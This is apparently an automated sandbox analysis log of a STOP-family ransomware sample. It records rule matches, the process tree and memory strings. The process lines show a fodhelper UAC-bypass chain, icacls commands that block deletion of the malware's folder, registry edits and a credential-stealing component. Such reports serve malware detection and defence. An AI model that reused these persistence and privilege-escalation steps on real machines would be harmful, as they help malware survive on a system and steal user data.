            Source: Process Memory Space: DB15.exe PID: 6320, type: MEMORYSTRMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
            Source: Process Memory Space: DB15.exe PID: 5356, type: MEMORYSTRMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
            Source: Process Memory Space: DB15.exe PID: 4436, type: MEMORYSTRMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
            Source: Process Memory Space: DB15.exe PID: 5988, type: MEMORYSTRMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
            Source: Process Memory Space: DB15.exe PID: 6848, type: MEMORYSTRMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
            Source: Process Memory Space: DB15.exe PID: 7144, type: MEMORYSTRMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
            Source: Process Memory Space: DB15.exe PID: 3544, type: MEMORYSTRMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
            Source: classification engineClassification label: mal100.rans.troj.spyw.expl.evad.winEXE@60/336@20/13
            Source: C:\Users\user\AppData\Local\Temp\DB15.exeCode function: 12_2_00411900 GetLastError,FormatMessageW,lstrlenW,lstrlenW,lstrlenW,LocalAlloc,lstrcpyW,lstrcatW,lstrcatW,lstrcatW,lstrcatW,lstrcatW,lstrlenW,_memset,lstrcpynW,MessageBoxW,LocalFree,LocalFree,LocalFree,12_2_00411900
            Source: C:\Users\user\Desktop\6uVlPQSJ4e.exeCode function: 0_2_00D26829 CreateToolhelp32Snapshot,Module32First,0_2_00D26829
            Source: C:\Users\user\AppData\Local\Temp\DB15.exeCode function: 12_2_0040D240 CoInitialize,CoInitializeSecurity,CoCreateInstance,VariantInit,VariantInit,VariantInit,VariantInit,VariantInit,VariantClear,VariantClear,VariantClear,VariantClear,CoUninitialize,CoUninitialize,CoUninitialize,__time64,__localtime64,_wcsftime,VariantInit,VariantInit,VariantClear,VariantClear,VariantClear,VariantClear,swprintf,CoUninitialize,CoUninitialize,12_2_0040D240
            Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Roaming\gtdiratJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
            Source: C:\Users\user\AppData\Local\Temp\DB15.exeMutant created: \Sessions\1\BaseNamedObjects\{1D6FC66E-D1F3-422C-8A53-C0BBCF3D900D}
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5008:120:WilError_03
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5088:120:WilError_03
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2036:120:WilError_03
            Source: C:\Windows\System32\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess4004
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5012:120:WilError_03
            Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Local\Temp\7F9A.tmpJump to behavior
            Source: C:\Windows\explorer.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\7F9A.bat" "
            Source: unknownProcess created: C:\Windows\explorer.exe
            Source: C:\Users\user\AppData\Local\Temp\DB15.exeCommand line argument: --Admin12_2_00419F90
            Source: C:\Users\user\AppData\Local\Temp\DB15.exeCommand line argument: IsAutoStart12_2_00419F90
            Source: C:\Users\user\AppData\Local\Temp\DB15.exeCommand line argument: IsTask12_2_00419F90
            Source: C:\Users\user\AppData\Local\Temp\DB15.exeCommand line argument: --ForNetRes12_2_00419F90
            Source: C:\Users\user\AppData\Local\Temp\DB15.exeCommand line argument: IsAutoStart12_2_00419F90
            Source: C:\Users\user\AppData\Local\Temp\DB15.exeCommand line argument: IsTask12_2_00419F90
            Source: C:\Users\user\AppData\Local\Temp\DB15.exeCommand line argument: --Task12_2_00419F90
            Source: C:\Users\user\AppData\Local\Temp\DB15.exeCommand line argument: --AutoStart12_2_00419F90
            Source: C:\Users\user\AppData\Local\Temp\DB15.exeCommand line argument: --Service12_2_00419F90
            Source: C:\Users\user\AppData\Local\Temp\DB15.exeCommand line argument: X1P12_2_00419F90
            Source: C:\Users\user\AppData\Local\Temp\DB15.exeCommand line argument: --Admin12_2_00419F90
            Source: C:\Users\user\AppData\Local\Temp\DB15.exeCommand line argument: runas12_2_00419F90
            Source: C:\Users\user\AppData\Local\Temp\DB15.exeCommand line argument: x2Q12_2_00419F90
            Source: C:\Users\user\AppData\Local\Temp\DB15.exeCommand line argument: x*P12_2_00419F90
            Source: C:\Users\user\AppData\Local\Temp\DB15.exeCommand line argument: C:\Windows\12_2_00419F90
            Source: C:\Users\user\AppData\Local\Temp\DB15.exeCommand line argument: D:\Windows\12_2_00419F90
            Source: C:\Users\user\AppData\Local\Temp\DB15.exeCommand line argument: 7P12_2_00419F90
            Source: C:\Users\user\AppData\Local\Temp\DB15.exeCommand line argument: %username%12_2_00419F90
            Source: C:\Users\user\AppData\Local\Temp\DB15.exeCommand line argument: F:\12_2_00419F90
            Source: C:\Users\user\AppData\Local\ff34e5c5-5271-4a45-be37-87b03007a6ce\DB15.exeCommand line argument: --Admin17_2_00419F90
            Source: C:\Users\user\AppData\Local\ff34e5c5-5271-4a45-be37-87b03007a6ce\DB15.exeCommand line argument: IsAutoStart17_2_00419F90
            Source: C:\Users\user\AppData\Local\ff34e5c5-5271-4a45-be37-87b03007a6ce\DB15.exeCommand line argument: IsTask17_2_00419F90
            Source: C:\Users\user\AppData\Local\ff34e5c5-5271-4a45-be37-87b03007a6ce\DB15.exeCommand line argument: --ForNetRes17_2_00419F90
            Source: C:\Users\user\AppData\Local\ff34e5c5-5271-4a45-be37-87b03007a6ce\DB15.exeCommand line argument: IsAutoStart17_2_00419F90
            Source: C:\Users\user\AppData\Local\ff34e5c5-5271-4a45-be37-87b03007a6ce\DB15.exeCommand line argument: IsTask17_2_00419F90
            Source: C:\Users\user\AppData\Local\ff34e5c5-5271-4a45-be37-87b03007a6ce\DB15.exeCommand line argument: --Task17_2_00419F90
            Source: C:\Users\user\AppData\Local\ff34e5c5-5271-4a45-be37-87b03007a6ce\DB15.exeCommand line argument: --AutoStart17_2_00419F90
            Source: C:\Users\user\AppData\Local\ff34e5c5-5271-4a45-be37-87b03007a6ce\DB15.exeCommand line argument: --Service17_2_00419F90
            Source: C:\Users\user\AppData\Local\ff34e5c5-5271-4a45-be37-87b03007a6ce\DB15.exeCommand line argument: X1P17_2_00419F90
            Source: C:\Users\user\AppData\Local\ff34e5c5-5271-4a45-be37-87b03007a6ce\DB15.exeCommand line argument: --Admin17_2_00419F90
            Source: C:\Users\user\AppData\Local\ff34e5c5-5271-4a45-be37-87b03007a6ce\DB15.exeCommand line argument: runas17_2_00419F90
            Source: C:\Users\user\AppData\Local\ff34e5c5-5271-4a45-be37-87b03007a6ce\DB15.exeCommand line argument: x2Q17_2_00419F90
            Source: C:\Users\user\AppData\Local\ff34e5c5-5271-4a45-be37-87b03007a6ce\DB15.exeCommand line argument: x*P17_2_00419F90
            Source: C:\Users\user\AppData\Local\ff34e5c5-5271-4a45-be37-87b03007a6ce\DB15.exeCommand line argument: C:\Windows\17_2_00419F90
            Source: C:\Users\user\AppData\Local\ff34e5c5-5271-4a45-be37-87b03007a6ce\DB15.exeCommand line argument: D:\Windows\17_2_00419F90
            Source: C:\Users\user\AppData\Local\ff34e5c5-5271-4a45-be37-87b03007a6ce\DB15.exeCommand line argument: 7P17_2_00419F90
            Source: C:\Users\user\AppData\Local\ff34e5c5-5271-4a45-be37-87b03007a6ce\DB15.exeCommand line argument: %username%17_2_00419F90
            Source: C:\Users\user\AppData\Local\ff34e5c5-5271-4a45-be37-87b03007a6ce\DB15.exeCommand line argument: F:\17_2_00419F90
            Source: 6uVlPQSJ4e.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: C:\Users\user\AppData\Local\Temp\71C9.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Name FROM Win32_Processor
            Source: C:\Windows\explorer.exeFile read: C:\Users\user\Searches\desktop.iniJump to behavior
            Source: C:\Users\user\Desktop\6uVlPQSJ4e.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
            Source: build2.exe, 00000029.00000002.3579393951.000000006C64F000.00000002.00000001.01000000.0000001A.sdmp, build2.exe, 00000029.00000002.3572254159.000000001E938000.00000002.00001000.00020000.00000000.sdmp, build2.exe, 00000029.00000002.3573071758.0000000020E7C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: UPDATE %Q.sqlite_master SET tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqliteX_autoindex%%' ESCAPE 'X' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
            Source: build2.exe, 00000029.00000002.3579393951.000000006C64F000.00000002.00000001.01000000.0000001A.sdmp, build2.exe, 00000029.00000002.3572254159.000000001E938000.00000002.00001000.00020000.00000000.sdmp, build2.exe, 00000029.00000002.3573071758.0000000020E7C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
            Source: build2.exe, 00000029.00000002.3579393951.000000006C64F000.00000002.00000001.01000000.0000001A.sdmp, build2.exe, 00000029.00000002.3572254159.000000001E938000.00000002.00001000.00020000.00000000.sdmp, build2.exe, 00000029.00000002.3573071758.0000000020E7C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
            Source: build2.exe, 00000029.00000002.3579393951.000000006C64F000.00000002.00000001.01000000.0000001A.sdmp, build2.exe, 00000029.00000002.3572254159.000000001E938000.00000002.00001000.00020000.00000000.sdmp, build2.exe, 00000029.00000002.3573071758.0000000020E7C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
            Source: build2.exe, 00000029.00000002.3572254159.000000001E938000.00000002.00001000.00020000.00000000.sdmp, build2.exe, 00000029.00000002.3573071758.0000000020E7C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: INSERT INTO "%w"."%w"("%w") VALUES('integrity-check');
            Source: build2.exe, 00000029.00000002.3572254159.000000001E938000.00000002.00001000.00020000.00000000.sdmp, build2.exe, 00000029.00000002.3573071758.0000000020E7C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE IF NOT EXISTS %s.'rbu_tmp_%q' AS SELECT *%s FROM '%q' WHERE 0;
            Source: build2.exe, 00000029.00000002.3579393951.000000006C64F000.00000002.00000001.01000000.0000001A.sdmp, build2.exe, 00000029.00000002.3572254159.000000001E938000.00000002.00001000.00020000.00000000.sdmp, build2.exe, 00000029.00000002.3573071758.0000000020E7C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: INSERT INTO %Q.sqlite_master VALUES('index',%Q,%Q,#%d,%Q);
            Source: build2.exe, 00000029.00000002.3579393951.000000006C64F000.00000002.00000001.01000000.0000001A.sdmp, build2.exe, 00000029.00000002.3572254159.000000001E938000.00000002.00001000.00020000.00000000.sdmp, build2.exe, 00000029.00000002.3573071758.0000000020E7C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
            Source: build2.exe, 00000029.00000002.3572254159.000000001E938000.00000002.00001000.00020000.00000000.sdmp, build2.exe, 00000029.00000002.3573071758.0000000020E7C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE x(addr INT,opcode TEXT,p1 INT,p2 INT,p3 INT,p4 TEXT,p5 INT,comment TEXT,subprog TEXT,nexec INT,ncycle INT,stmt HIDDEN);
            Source: A0B.exe, 00000017.00000003.3014458881.0000000003A95000.00000004.00000800.00020000.00000000.sdmp, A0B.exe, 00000017.00000003.3024977226.0000000001515000.00000004.00000020.00020000.00000000.sdmp, A0B.exe, 00000017.00000003.3013109239.0000000003AC4000.00000004.00000800.00020000.00000000.sdmp, build2.exe, 00000029.00000003.3330699453.0000000000A4D000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000029.00000003.3316385909.0000000000A0E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
            Source: build2.exe, 00000029.00000002.3572254159.000000001E938000.00000002.00001000.00020000.00000000.sdmp, build2.exe, 00000029.00000002.3573071758.0000000020E7C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY,parentnode);
            Source: build2.exe, 00000029.00000002.3572254159.000000001E938000.00000002.00001000.00020000.00000000.sdmp, build2.exe, 00000029.00000002.3573071758.0000000020E7C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE x(type TEXT,schema TEXT,name TEXT,wr INT,subprog TEXT,stmt HIDDEN);
            Source: 6uVlPQSJ4e.exeReversingLabs: Detection: 31%
            Source: DB15.exeString found in binary or memory: set-addPolicy
            Source: DB15.exeString found in binary or memory: id-cmc-addExtensions
            Source: DB15.exeString found in binary or memory: set-addPolicy
            Source: DB15.exeString found in binary or memory: id-cmc-addExtensions
            Source: DB15.exeString found in binary or memory: set-addPolicy
            Source: DB15.exeString found in binary or memory: id-cmc-addExtensions
            Source: DB15.exeString found in binary or memory: set-addPolicy
            Source: DB15.exeString found in binary or memory: id-cmc-addExtensions
            Source: unknownProcess created: C:\Users\user\Desktop\6uVlPQSJ4e.exe "C:\Users\user\Desktop\6uVlPQSJ4e.exe"
            Source: unknownProcess created: C:\Users\user\AppData\Roaming\gtdirat C:\Users\user\AppData\Roaming\gtdirat
            Source: C:\Windows\explorer.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\7F9A.bat" "
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe reg add "HKEY_CURRENT_USER\Software\clicker\key" /v primary /t REG_DWORD /d 1
            Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\Temp\DB15.exe C:\Users\user\AppData\Local\Temp\DB15.exe
            Source: C:\Users\user\AppData\Local\Temp\DB15.exeProcess created: C:\Users\user\AppData\Local\Temp\DB15.exe C:\Users\user\AppData\Local\Temp\DB15.exe
            Source: C:\Users\user\AppData\Local\Temp\DB15.exeProcess created: C:\Windows\SysWOW64\icacls.exe icacls "C:\Users\user\AppData\Local\ff34e5c5-5271-4a45-be37-87b03007a6ce" /deny *S-1-1-0:(OI)(CI)(DE,DC)
            Source: unknownProcess created: C:\Users\user\AppData\Local\ff34e5c5-5271-4a45-be37-87b03007a6ce\DB15.exe C:\Users\user\AppData\Local\ff34e5c5-5271-4a45-be37-87b03007a6ce\DB15.exe --Task
            Source: C:\Users\user\AppData\Local\ff34e5c5-5271-4a45-be37-87b03007a6ce\DB15.exeProcess created: C:\Users\user\AppData\Local\ff34e5c5-5271-4a45-be37-87b03007a6ce\DB15.exe C:\Users\user\AppData\Local\ff34e5c5-5271-4a45-be37-87b03007a6ce\DB15.exe --Task
            Source: C:\Users\user\AppData\Local\Temp\DB15.exeProcess created: C:\Users\user\AppData\Local\Temp\DB15.exe "C:\Users\user\AppData\Local\Temp\DB15.exe" --Admin IsNotAutoStart IsNotTask
            Source: C:\Users\user\AppData\Local\Temp\DB15.exeProcess created: C:\Users\user\AppData\Local\Temp\DB15.exe "C:\Users\user\AppData\Local\Temp\DB15.exe" --Admin IsNotAutoStart IsNotTask
            Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\ff34e5c5-5271-4a45-be37-87b03007a6ce\DB15.exe "C:\Users\user\AppData\Local\ff34e5c5-5271-4a45-be37-87b03007a6ce\DB15.exe" --AutoStart
            Source: C:\Users\user\AppData\Local\ff34e5c5-5271-4a45-be37-87b03007a6ce\DB15.exeProcess created: C:\Users\user\AppData\Local\ff34e5c5-5271-4a45-be37-87b03007a6ce\DB15.exe "C:\Users\user\AppData\Local\ff34e5c5-5271-4a45-be37-87b03007a6ce\DB15.exe" --AutoStart
            Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\Temp\A0B.exe C:\Users\user\AppData\Local\Temp\A0B.exe
            Source: C:\Windows\explorer.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\5F8F.bat" "
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe reg add "HKEY_CURRENT_USER\Software\clicker\key" /v primary /t REG_DWORD /d 1
            Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\ff34e5c5-5271-4a45-be37-87b03007a6ce\DB15.exe "C:\Users\user\AppData\Local\ff34e5c5-5271-4a45-be37-87b03007a6ce\DB15.exe" --AutoStart
            Source: C:\Users\user\AppData\Local\ff34e5c5-5271-4a45-be37-87b03007a6ce\DB15.exeProcess created: C:\Users\user\AppData\Local\ff34e5c5-5271-4a45-be37-87b03007a6ce\DB15.exe "C:\Users\user\AppData\Local\ff34e5c5-5271-4a45-be37-87b03007a6ce\DB15.exe" --AutoStart
            Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\Temp\71C9.exe C:\Users\user\AppData\Local\Temp\71C9.exe
            Source: C:\Windows\explorer.exeProcess created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 4004 -s 10520
            Source: C:\Users\user\AppData\Local\Temp\71C9.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\Sysnative\cmd.exe /C fodhelper
            Source: unknownProcess created: C:\Windows\explorer.exe explorer.exe
            Source: unknownProcess created: C:\Users\user\AppData\Local\c6ede164-9d46-4090-a93b-69cacd3fb0cf\build2.exe "C:\Users\user\AppData\Local\c6ede164-9d46-4090-a93b-69cacd3fb0cf\build2.exe"
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\fodhelper.exe fodhelper
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\fodhelper.exe "C:\Windows\system32\fodhelper.exe"
            Source: unknownProcess created: C:\Users\user\AppData\Local\c6ede164-9d46-4090-a93b-69cacd3fb0cf\build2.exe "C:\Users\user\AppData\Local\c6ede164-9d46-4090-a93b-69cacd3fb0cf\build2.exe"
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\fodhelper.exe "C:\Windows\system32\fodhelper.exe"
            Source: C:\Users\user\AppData\Local\Temp\DB15.exeProcess created: C:\Users\user\AppData\Local\c6ede164-9d46-4090-a93b-69cacd3fb0cf\build3.exe "C:\Users\user\AppData\Local\c6ede164-9d46-4090-a93b-69cacd3fb0cf\build3.exe"
            Source: C:\Windows\System32\fodhelper.exeProcess created: C:\Users\user\AppData\Local\Temp\71C9.exe "C:\Users\user\AppData\Local\Temp\71C9.exe"
            Source: C:\Users\user\AppData\Local\Temp\71C9.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -nologo -noprofile
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Windows\explorer.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\7F9A.bat" "Jump to behavior
            Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\Temp\DB15.exe C:\Users\user\AppData\Local\Temp\DB15.exeJump to behavior
            Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\ff34e5c5-5271-4a45-be37-87b03007a6ce\DB15.exe "C:\Users\user\AppData\Local\ff34e5c5-5271-4a45-be37-87b03007a6ce\DB15.exe" --AutoStartJump to behavior
            Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\Temp\A0B.exe C:\Users\user\AppData\Local\Temp\A0B.exeJump to behavior
            Source: C:\Windows\explorer.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\5F8F.bat" "Jump to behavior
            Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\ff34e5c5-5271-4a45-be37-87b03007a6ce\DB15.exe "C:\Users\user\AppData\Local\ff34e5c5-5271-4a45-be37-87b03007a6ce\DB15.exe" --AutoStartJump to behavior
            Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\Temp\71C9.exe C:\Users\user\AppData\Local\Temp\71C9.exeJump to behavior
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe reg add "HKEY_CURRENT_USER\Software\clicker\key" /v primary /t REG_DWORD /d 1Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\DB15.exeProcess created: C:\Users\user\AppData\Local\Temp\DB15.exe C:\Users\user\AppData\Local\Temp\DB15.exeJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\DB15.exeProcess created: C:\Windows\SysWOW64\icacls.exe icacls "C:\Users\user\AppData\Local\ff34e5c5-5271-4a45-be37-87b03007a6ce" /deny *S-1-1-0:(OI)(CI)(DE,DC)Jump to behavior
            Source: C:\Users\user\AppData\Local\ff34e5c5-5271-4a45-be37-87b03007a6ce\DB15.exeProcess created: C:\Users\user\AppData\Local\ff34e5c5-5271-4a45-be37-87b03007a6ce\DB15.exe C:\Users\user\AppData\Local\ff34e5c5-5271-4a45-be37-87b03007a6ce\DB15.exe --TaskJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\DB15.exeProcess created: C:\Users\user\AppData\Local\Temp\DB15.exe "C:\Users\user\AppData\Local\Temp\DB15.exe" --Admin IsNotAutoStart IsNotTask
            Source: C:\Users\user\AppData\Local\Temp\DB15.exeProcess created: C:\Users\user\AppData\Local\c6ede164-9d46-4090-a93b-69cacd3fb0cf\build2.exe "C:\Users\user\AppData\Local\c6ede164-9d46-4090-a93b-69cacd3fb0cf\build2.exe"
            Source: C:\Users\user\AppData\Local\Temp\DB15.exeProcess created: C:\Users\user\AppData\Local\c6ede164-9d46-4090-a93b-69cacd3fb0cf\build3.exe "C:\Users\user\AppData\Local\c6ede164-9d46-4090-a93b-69cacd3fb0cf\build3.exe"
            Source: C:\Users\user\AppData\Local\ff34e5c5-5271-4a45-be37-87b03007a6ce\DB15.exeProcess created: C:\Users\user\AppData\Local\ff34e5c5-5271-4a45-be37-87b03007a6ce\DB15.exe "C:\Users\user\AppData\Local\ff34e5c5-5271-4a45-be37-87b03007a6ce\DB15.exe" --AutoStart
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe reg add "HKEY_CURRENT_USER\Software\clicker\key" /v primary /t REG_DWORD /d 1
            Source: C:\Users\user\AppData\Local\ff34e5c5-5271-4a45-be37-87b03007a6ce\DB15.exeProcess created: C:\Users\user\AppData\Local\ff34e5c5-5271-4a45-be37-87b03007a6ce\DB15.exe "C:\Users\user\AppData\Local\ff34e5c5-5271-4a45-be37-87b03007a6ce\DB15.exe" --AutoStart
            Source: C:\Users\user\AppData\Local\Temp\71C9.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\Sysnative\cmd.exe /C fodhelper
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\fodhelper.exe fodhelper
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\fodhelper.exe "C:\Windows\system32\fodhelper.exe"
            Source: C:\Users\user\AppData\Local\c6ede164-9d46-4090-a93b-69cacd3fb0cf\build2.exeProcess created: C:\Users\user\AppData\Local\c6ede164-9d46-4090-a93b-69cacd3fb0cf\build2.exe "C:\Users\user\AppData\Local\c6ede164-9d46-4090-a93b-69cacd3fb0cf\build2.exe"
            Source: C:\Windows\System32\fodhelper.exeProcess created: C:\Users\user\AppData\Local\Temp\71C9.exe "C:\Users\user\AppData\Local\Temp\71C9.exe"
            Source: C:\Users\user\AppData\Local\c6ede164-9d46-4090-a93b-69cacd3fb0cf\build3.exeProcess created: unknown unknown
            Source: C:\Users\user\AppData\Local\Temp\71C9.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -nologo -noprofile
            Source: C:\Windows\explorer.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{603D3801-BD81-11d0-A3A5-00C04FD706EC}\InProcServer32Jump to behavior
            Source: Window RecorderWindow detected: More than 3 window changes detected
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
            Source: C:\Windows\System32\fodhelper.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\16.0\Access\Capabilities\UrlAssociations
            Source: C:\Users\user\Desktop\6uVlPQSJ4e.exeFile opened: C:\Windows\SysWOW64\msvcr100.dllJump to behavior
            Source: 6uVlPQSJ4e.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
            Source: Binary string: mozglue.pdbP source: build2.exe, 00000029.00000002.3578472192.000000006C48D000.00000002.00000001.01000000.0000001B.sdmp
            Source: Binary string: Loader.pdb source: 71C9.exe, 0000001D.00000002.3174783125.0000000000843000.00000040.00000001.01000000.0000000B.sdmp, 71C9.exe, 0000001D.00000002.3185463938.00000000035D3000.00000040.00001000.00020000.00000000.sdmp, 71C9.exe, 0000001D.00000003.3083456233.0000000003EC2000.00000004.00001000.00020000.00000000.sdmp, 71C9.exe, 0000002C.00000002.4539281116.0000000003533000.00000040.00001000.00020000.00000000.sdmp
